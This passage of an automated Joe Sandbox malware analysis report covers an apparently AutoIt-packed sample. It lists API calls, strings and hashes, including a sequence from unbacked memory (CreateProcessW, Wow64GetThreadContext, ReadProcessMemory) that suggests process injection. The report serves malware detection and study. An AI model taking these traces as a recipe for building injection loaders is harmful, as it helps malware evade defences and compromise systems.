                                                                                                                  • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 02E426A1
                                                                                                                  • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 02E428C7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062920973.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e40000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFileFreeVirtual
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 204039940-0
                                                                                                                  • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                                                  • Instruction ID: 9fe9c88e974784f6f3350300c1c64973faf4fc109492a604d5ae0897e11922de
                                                                                                                  • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                                                                                                  • Instruction Fuzzy Hash: 51A1F974E40209EBDB14CFA4D998BEEBBB5FF48304F209559E601BB280DB759A81CF54

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 1402 40e4c0-40e4e5 call 403350 RegOpenKeyExW 1405 427190-4271ae RegQueryValueExW 1402->1405 1406 40e4eb-40e4f0 1402->1406 1407 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 1405->1407 1408 42721a-42722a RegCloseKey 1405->1408 1413 427210-427219 call 436508 1407->1413 1414 4271f7-42720e call 402160 1407->1414 1413->1408 1414->1413
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                                                                                                                  • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: QueryValue$CloseOpen
                                                                                                                  • String ID: Include$Software\AutoIt v3\AutoIt
                                                                                                                  • API String ID: 1586453840-614718249
                                                                                                                  • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                  • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                                                                                                                  • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                                                                                                                  • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                                                                                                                  APIs
                                                                                                                  • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                                                                  • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                                                                  • ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CreateShow
                                                                                                                  • String ID: AutoIt v3$edit
                                                                                                                  • API String ID: 1584632944-3779509399
                                                                                                                  • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                  • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                                                                                                                  • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                                                                                                                  • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02E422A0: Sleep.KERNELBASE(000001F4), ref: 02E422B1
                                                                                                                  • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02E424C9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062920973.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e40000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateFileSleep
                                                                                                                  • String ID: ZC73PKLULRC6873P4DJ61N9
                                                                                                                  • API String ID: 2694422964-411282024
                                                                                                                  • Opcode ID: d6c4b08f2d38d7462dc1ddb63bdf930b2ef0ff9d37b0ffecde3ad91b3e1f3570
                                                                                                                  • Instruction ID: fccc86f2f712d2041c1921ef6266a429dea49753f2b3749cdafd6e38a9529b25
                                                                                                                  • Opcode Fuzzy Hash: d6c4b08f2d38d7462dc1ddb63bdf930b2ef0ff9d37b0ffecde3ad91b3e1f3570
                                                                                                                  • Instruction Fuzzy Hash: F5518630D44289DAEF11D7E4D854BEEBB79AF15304F048199E608BB2C0DBB91B45CBA5
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                                                                                                                  • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                                                                                                                  • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                                                                                                                  • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Close$OpenQueryValue
                                                                                                                  • String ID: Control Panel\Mouse
                                                                                                                  • API String ID: 1607946009-824357125
                                                                                                                  • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                  • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                                                                                                                  • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                                                                                                                  • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                                                                                                                  APIs
                                                                                                                  • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                  • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                  • _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                  • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                  • _wcsncpy.LIBCMT ref: 00410340
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3170942423-0
                                                                                                                  • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                  • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                                                                                                                  • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                                                                                                                  • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4
                                                                                                                  APIs
                                                                                                                  • CreateProcessW.KERNELBASE(?,00000000), ref: 02E41A5B
                                                                                                                  • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 02E41AF1
                                                                                                                  • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02E41B13
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062920973.0000000002E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2e40000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2438371351-0
                                                                                                                  • Opcode ID: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                                                                  • Instruction ID: bf677cddd54080f0874830b203e90c469af45fc0521e271e8967d4d30150bea0
                                                                                                                  • Opcode Fuzzy Hash: a5f8eca76df1c4d60a387bf050efe929c827b8bdc82418feca4108ede207e1c1
                                                                                                                  • Instruction Fuzzy Hash: 4C621C34A54258DBEB24CFA4D850BDEB372EF58304F1091A9E10DEB390EB759E81CB59
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2782032738-0
                                                                                                                  • Opcode ID: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
                                                                                                                  • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                                                                                  • Opcode Fuzzy Hash: d8ae21c13c021e62aa76494794d103b2c936eccb4f68827660fccbfed6d63495
                                                                                                                  • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _memmove
                                                                                                                  • String ID: Error:
                                                                                                                  • API String ID: 4104443479-232661952
                                                                                                                  • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                  • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                                                                                                                  • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                                                                                                                  • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                                                                                                                  APIs
                                                                                                                  • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                                                                                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                    • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                                                                                                    • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                                                                                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                                                                                                    • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                                                                                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                                                                                                    • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                                                                                                                  • String ID: X$pWH
                                                                                                                  • API String ID: 85490731-941433119
                                                                                                                  • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                  • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                                                                                                  • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                                                                                                  • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __fread_nolock_memmove
                                                                                                                  • String ID: EA06
                                                                                                                  • API String ID: 1988441806-3962188686
                                                                                                                  • Opcode ID: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                                                                                                  • Instruction ID: b3ef0f2836274d974f80c1c05754fec17bf4118f678989acdc9742ef3c25ced0
                                                                                                                  • Opcode Fuzzy Hash: 280269e25119450008068f00ad9edd5e8afa750bad36086ed969abcc4da80e9d
                                                                                                                  • Instruction Fuzzy Hash: 7D014971904228ABCF18DB99DC56EFEBBF49F55301F00859EF59793281D578A708CBA0
                                                                                                                  APIs
                                                                                                                  • GetTempPathW.KERNEL32(00000104,?), ref: 00431E34
                                                                                                                  • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00431E4C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Temp$FileNamePath
                                                                                                                  • String ID: aut
                                                                                                                  • API String ID: 3285503233-3010740371
                                                                                                                  • Opcode ID: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                                  • Instruction ID: 5bfe3c05d54daaccf8cad0b894ff223c4051d717a215ac0b7ff4b7edb98d8c84
                                                                                                                  • Opcode Fuzzy Hash: b5938d8baa24fa8bd6c9fd2b7d62684d192cfd552bf23c00763a11c17351aebe
                                                                                                                  • Instruction Fuzzy Hash: A8D05EB95403086BD324EB90ED4EFA9777CE744700F508AE9BE14461D1AAF06A54CBE9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                  • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                                                                                                                  • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                                                                                                                  • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: __filbuf__getptd_noexit__read_memcpy_s
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1794320848-0
                                                                                                                  • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                  • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                                                                                                                  • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                                                                                                                  • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                                                                                                                  APIs
                                                                                                                  • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                                                                                                                  • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2062325346.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2062305492.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062380054.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062404825.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062423933.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062445006.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2062487236.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_9L83v5j083.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Process$CurrentTerminate
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2429186680-0
                                                                                                                  • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                  • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                                                                                                                  • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                                                                                                                  • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                                                                                                                  APIs
                                                                                                                  • _malloc.LIBCMT ref: 0043214B
                                                                                                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                                                                                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
